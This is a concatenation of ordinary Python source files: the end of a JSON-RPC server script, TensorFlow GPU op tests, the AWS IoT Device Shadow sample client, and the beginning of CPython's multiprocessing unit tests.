prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
basic_gpu_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for basic component wise operations using a GPU device."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.gen_array_ops import broadcast_gradient_args
from tensorflow.python.platform import test
class GPUBinaryOpsTest(test.TestCase):
def _compareGPU(self, x, y, np_func, tf_func):
with self.cached_session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = self.evaluate(out)
with self.cached_session(use_gpu=False) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_cpu = self.evaluate(out)
self.assertAllClose(tf_cpu, tf_gpu)
def testFloatBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float32)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
self._compareGPU(x, y + 0.1, np.floor_divide, math_ops.floordiv)
self._compareGPU(x, y, np.power, math_ops.pow)
def testFloatWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float32)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float64)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float64)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
class MathBuiltinUnaryTest(test.TestCase):
def _compare(self, x, np_func, tf_func, use_gpu):
np_out = np_func(x)
with self.cached_session(use_gpu=use_gpu) as sess:
inx = ops.convert_to_tensor(x)
ofunc = tf_func(inx)
tf_out = self.evaluate(ofunc)
self.assertAllClose(np_out, tf_out)
def _inv(self, x):
return 1.0 / x
def _rsqrt(self, x):
return self._inv(np.sqrt(x))
def _testDtype(self, dtype, use_gpu):
data = (np.arange(-3, 3) / 4.).reshape([1, 3, 2]).astype(dtype)
data_gt_1 = data + 2 # for x > 1
self._compare(data, np.abs, math_ops.abs, use_gpu)
self._compare(data, np.arccos, math_ops.acos, use_gpu)
self._compare(data, np.arcsin, math_ops.asin, use_gpu)
self._compare(data, np.arcsinh, math_ops.asinh, use_gpu)
self._compare(data_gt_1, np.arccosh, math_ops.acosh, use_gpu)
self._compare(data, np.arctan, math_ops.atan, use_gpu)
self._compare(data, np.ceil, math_ops.ceil, use_gpu)
self._compare(data, np.cos, math_ops.cos, use_gpu)
self._compare(data, np.cosh, math_ops.cosh, use_gpu)
self._compare(data, np.exp, math_ops.exp, use_gpu)
self._compare(data, np.floor, math_ops.floor, use_gpu)
self._compare(data, np.log, math_ops.log, use_gpu)
self._compare(data, np.log1p, math_ops.log1p, use_gpu)
self._compare(data, np.negative, math_ops.negative, use_gpu)
self._compare(data, self._rsqrt, math_ops.rsqrt, use_gpu)
self._compare(data, np.sin, math_ops.sin, use_gpu)
self._compare(data, np.sinh, math_ops.sinh, use_gpu)
self._compare(data, np.sqrt, math_ops.sqrt, use_gpu)
self._compare(data, np.square, math_ops.square, use_gpu)
self._compare(data, np.tan, math_ops.tan, use_gpu)
self._compare(data, np.tanh, math_ops.tanh, use_gpu)
self._compare(data, np.arctanh, math_ops.atanh, use_gpu)
def testTypes(self):
for dtype in [np.float32]:
self._testDtype(dtype, use_gpu=True)
def testFloorDivide(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
np_out = np.floor_divide(x, y + 0.1)
with self.session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y + 0.1)
ofunc = inx / iny
out_func2 = math_ops.floor(ofunc)
tf_out = self.evaluate(out_func2)
self.assertAllClose(np_out, tf_out)
class BroadcastSimpleTest(test.TestCase):
def _GetGradientArgs(self, xs, ys):
with self.cached_session(use_gpu=True) as sess:
return sess.run(broadcast_gradient_args(xs, ys))
@test_util.run_deprecated_v1
def testBroadcast(self):
r0, r1 = self._GetGradientArgs([2, 3, 5], [1])
self.assertAllEqual(r0, [])
self.assertAllEqual(r1, [0, 1, 2])
_GRAD_TOL = {dtypes.float32: 1e-3}
def _compareGradientX(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.cached_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
xs = list(x.shape)
jacob_t, jacob_n = gradient_checker.compute_gradient(
inx, xs, out, zs, x_init_value=x)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGradientY(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.cached_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
ys = list(np.shape(y))
jacob_t, jacob_n = gradient_checker.compute_gradient(
iny, ys, out, zs, x_init_value=y)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGpu(self, x, y, np_func, tf_func):
np_ans = np_func(x, y)
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = self.evaluate(out)
self.assertAllClose(np_ans, tf_gpu)
self.assertShapeEqual(np_ans, out)
# TODO(zhifengc/ke): make gradient checker work on GPU.
@test_util.run_deprecated_v1
def testGradient(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
self._compareGradientX(x, y, np.true_divide, math_ops.truediv)
self._compareGradientY(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y + 0.1, np.floor_divide, math_ops.floordiv)
class GpuMultiSessionMemoryTest(test_util.TensorFlowTestCase):
"""Tests concurrent sessions executing on the same GPU."""
def _run_session(self, session, results):
n_iterations = 500
with session as s:
data = variables.Variable(1.0)
with ops.device('/device:GPU:0'):
random_seed.set_random_seed(1)
matrix1 = variables.Variable(
random_ops.truncated_normal([1024, 1]), name='matrix1')
matrix2 = variables.Variable(
random_ops.truncated_normal([1, 1024]), name='matrix2')
x1 = math_ops.multiply(data, matrix1, name='x1')
x3 = math_ops.matmul(x1, math_ops.matmul(matrix2, matrix1))
x4 = math_ops.matmul(array_ops.transpose(x3), x3, name='x4')
s.run(variables.global_variables_initializer())
for _ in xrange(n_iterations):
value = s.run(x4)
results.add(value.flat[0])
if len(results) != 1:
break
@test_util.run_v1_only('b/126596827 needs graph mode in multiple threads')
def testConcurrentSessions(self):
n_threads = 4
threads = []
results = []
for _ in xrange(n_threads):
session = self.session(graph=ops.Graph(), use_gpu=True)
results.append(set())
args = (session, results[-1])
threads.append(threading.Thread(target=self._run_session, args=args))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
flat_results = set([x for x in itertools.chain(*results)])
self.assertEqual(1,
len(flat_results),
'Expected single value, got %r' % flat_results)
if __name__ == '__main__':
test.main()
|
shadow.py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import argparse
from awscrt import auth, io, mqtt, http
from awsiot import iotshadow
from awsiot import mqtt_connection_builder
from concurrent.futures import Future
import sys
import threading
import traceback
from uuid import uuid4
# - Overview -
# This sample uses the AWS IoT Device Shadow Service to keep a property in
# sync between device and server. Imagine a light whose color may be changed
# through an app, or set by a local user.
#
# - Instructions -
# Once connected, type a value in the terminal and press Enter to update
# the property's "reported" value. The sample also responds when the "desired"
# value changes on the server. To observe this, edit the Shadow document in
# the AWS Console and set a new "desired" value.
#
# - Detail -
# On startup, the sample requests the shadow document to learn the property's
# initial state. The sample also subscribes to "delta" events from the server,
# which are sent when a property's "desired" value differs from its "reported"
# value. When the sample learns of a new desired value, that value is changed
# on the device and an update is sent to the server with the new "reported"
# value.
parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server")
parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " +
"Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"")
parser.add_argument('--cert', help="File path to your client certificate, in PEM format")
parser.add_argument('--key', help="File path to your private key file, in PEM format")
parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " +
"Necessary if MQTT server uses a certificate that's not already in " +
"your trust store")
parser.add_argument('--client-id', default="test-" + str(uuid4()), help="Client ID for MQTT connection.")
parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing")
parser.add_argument('--shadow-property', default="color", help="Name of property in shadow to keep in sync")
parser.add_argument('--use-websocket', default=False, action='store_true',
help="To use a websocket instead of raw mqtt. If you " +
"specify this option you must specify a region for signing.")
parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " +
"is the region that will be used for computing the Sigv4 signature")
parser.add_argument('--proxy-host', help="Hostname of proxy to connect to.")
parser.add_argument('--proxy-port', type=int, default=8080, help="Port of proxy to connect to.")
parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name,
help='Logging level')
# Using globals to simplify sample code
is_sample_done = threading.Event()
mqtt_connection = None
shadow_client = None
thing_name = ""
shadow_property = ""
SHADOW_VALUE_DEFAULT = "off"
class LockedData:
def __init__(self):
self.lock = threading.Lock()
self.shadow_value = None
self.disconnect_called = False
self.request_tokens = set()
locked_data = LockedData()
# Function for gracefully quitting this sample
def exit(msg_or_exception):
if isinstance(msg_or_exception, Exception):
print("Exiting sample due to exception.")
traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2])
else:
print("Exiting sample:", msg_or_exception)
with locked_data.lock:
if not locked_data.disconnect_called:
print("Disconnecting...")
locked_data.disconnect_called = True
future = mqtt_connection.disconnect()
future.add_done_callback(on_disconnected)
def on_disconnected(disconnect_future):
# type: (Future) -> None
print("Disconnected.")
# Signal that sample is finished
is_sample_done.set()
def on_get_shadow_accepted(response):
# type: (iotshadow.GetShadowResponse) -> None
try:
with locked_data.lock:
# check that this is a response to a request from this session
try:
locked_data.request_tokens.remove(response.client_token)
except KeyError:
print("Ignoring get_shadow_accepted message due to unexpected token.")
return
print("Finished getting initial shadow state.")
if locked_data.shadow_value is not None:
print(" Ignoring initial query because a delta event has already been received.")
return
if response.state:
if response.state.delta:
value = response.state.delta.get(shadow_property)
if value:
print(" Shadow contains delta value '{}'.".format(value))
change_shadow_value(value)
return
if response.state.reported:
value = response.state.reported.get(shadow_property)
if value:
print(" Shadow contains reported value '{}'.".format(value))
set_local_value_due_to_initial_query(response.state.reported[shadow_property])
return
print(" Shadow document lacks '{}' property. Setting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
except Exception as e:
exit(e)
def on_get_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(error.client_token)
except KeyError:
print("Ignoring get_shadow_rejected message due to unexpected token.")
return
if error.code == 404:
print("Thing has no shadow document. Creating with defaults...")
change_shadow_value(SHADOW_VALUE_DEFAULT)
else:
exit("Get request was rejected. code:{} message:'{}'".format(
error.code, error.message))
except Exception as e:
exit(e)
def on_shadow_delta_updated(delta):
# type: (iotshadow.ShadowDeltaUpdatedEvent) -> None
try:
print("Received shadow delta event.")
if delta.state and (shadow_property in delta.state):
value = delta.state[shadow_property]
if value is None:
print(" Delta reports that '{}' was deleted. Resetting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
else:
print(" Delta reports that desired value is '{}'. Changing local value...".format(value))
change_shadow_value(value)
else:
print(" Delta did not report a change in '{}'".format(shadow_property))
except Exception as e:
exit(e)
def on_publish_update_shadow(future):
#type: (Future) -> None
try:
future.result()
print("Update request published.")
except Exception as e:
print("Failed to publish update request.")
exit(e)
def on_update_shadow_accepted(response):
# type: (iotshadow.UpdateShadowResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(response.client_token)
except KeyError:
print("Ignoring update_shadow_accepted message due to unexpected token.")
return
try:
print("Finished updating reported shadow value to '{}'.".format(response.state.reported[shadow_property])) # type: ignore
print("Enter desired value: ") # remind user they can input new values
except:
exit("Updated shadow is missing the target property.")
except Exception as e:
exit(e)
def on_update_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(error.client_token)
except KeyError:
print("Ignoring update_shadow_rejected message due to unexpected token.")
return
exit("Update request was rejected. code:{} message:'{}'".format(
error.code, error.message))
except Exception as e:
exit(e)
def set_local_value_due_to_initial_query(reported_value):
with locked_data.lock:
locked_data.shadow_value = reported_value
print("Enter desired value: ") # remind user they can input new values
def change_shadow_value(value):
with locked_data.lock:
if locked_data.shadow_value == value:
print("Local value is already '{}'.".format(value))
print("Enter desired value: ") # remind user they can input new values
return
print("Changed local shadow value to '{}'.".format(value))
locked_data.shadow_value = value
print("Updating reported shadow value to '{}'...".format(value))
# use a unique token so we can correlate this "request" message to
# any "response" messages received on the /accepted and /rejected topics
token = str(uuid4())
request = iotshadow.UpdateShadowRequest(
thing_name=thing_name,
state=iotshadow.ShadowState(
reported={ shadow_property: value },
desired={ shadow_property: value },
),
client_token=token,
)
future = shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE)
locked_data.request_tokens.add(token)
future.add_done_callback(on_publish_update_shadow)
def user_input_thread_fn():
while True:
try:
# Read user input
new_value = input()
# If user wants to quit sample, then quit.
# Otherwise change the shadow value.
if new_value in ['exit', 'quit']:
exit("User has quit")
break
else:
change_shadow_value(new_value)
except Exception as e:
print("Exception on input thread.")
exit(e)
break
if __name__ == '__main__':
# Process input args
args = parser.parse_args()
thing_name = args.thing_name
shadow_property = args.shadow_property
io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr')
# Spin up resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
proxy_options = None
if (args.proxy_host):
proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port)
if args.use_websocket == True:
credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap)
mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing(
endpoint=args.endpoint,
client_bootstrap=client_bootstrap,
region=args.signing_region,
credentials_provider=credentials_provider,
http_proxy_options=proxy_options,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=True,
keep_alive_secs=6)
else:
mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=args.endpoint,
cert_filepath=args.cert,
pri_key_filepath=args.key,
client_bootstrap=client_bootstrap,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=True,
keep_alive_secs=6,
http_proxy_options=proxy_options)
print("Connecting to {} with client ID '{}'...".format(
args.endpoint, args.client_id))
connected_future = mqtt_connection.connect()
shadow_client = iotshadow.IotShadowClient(mqtt_connection)
# Wait for connection to be fully established.
# Note that it's not necessary to wait, commands issued to the
# mqtt_connection before its fully connected will simply be queued.
# But this sample waits here so it's obvious when a connection
# fails or succeeds.
connected_future.result()
print("Connected!")
try:
# Subscribe to necessary topics.
# Note that is **is** important to wait for "accepted/rejected" subscriptions
# to succeed before publishing the corresponding "request".
print("Subscribing to Update responses...")
update_accepted_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_accepted(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_accepted)
update_rejected_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_rejected(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_rejected)
# Wait for subscriptions to succeed
update_accepted_subscribed_future.result()
update_rejected_subscribed_future.result()
print("Subscribing to Get responses...")
get_accepted_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_accepted(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_accepted)
get_rejected_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_rejected(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_rejected)
# Wait for subscriptions to succeed
get_accepted_subscribed_future.result()
get_rejected_subscribed_future.result()
print("Subscribing to Delta events...")
delta_subscribed_future, _ = shadow_client.subscribe_to_shadow_delta_updated_events(
request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_shadow_delta_updated)
# Wait for subscription to succeed
delta_subscribed_future.result()
# The rest of the sample runs asynchronously.
# Issue request for shadow's current state.
# The response will be received by the on_get_accepted() callback
print("Requesting current shadow state...")
with locked_data.lock:
# use a unique token so we can correlate this "request" message to
# any "response" messages received on the /accepted and /rejected topics
token = str(uuid4())
publish_get_future = shadow_client.publish_get_shadow(
request=iotshadow.GetShadowRequest(thing_name=args.thing_name, client_token=token),
qos=mqtt.QoS.AT_LEAST_ONCE)
locked_data.request_tokens.add(token)
# Ensure that publish succeeds
publish_get_future.result()
# Launch thread to handle user input.
# A "daemon" thread won't prevent the program from shutting down.
print("Launching thread to read user input...")
user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread')
user_input_thread.daemon = True
user_input_thread.start()
except Exception as e:
exit(e)
# Wait for the sample to finish (user types 'quit', or an error occurs)
is_sample_done.wait()
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
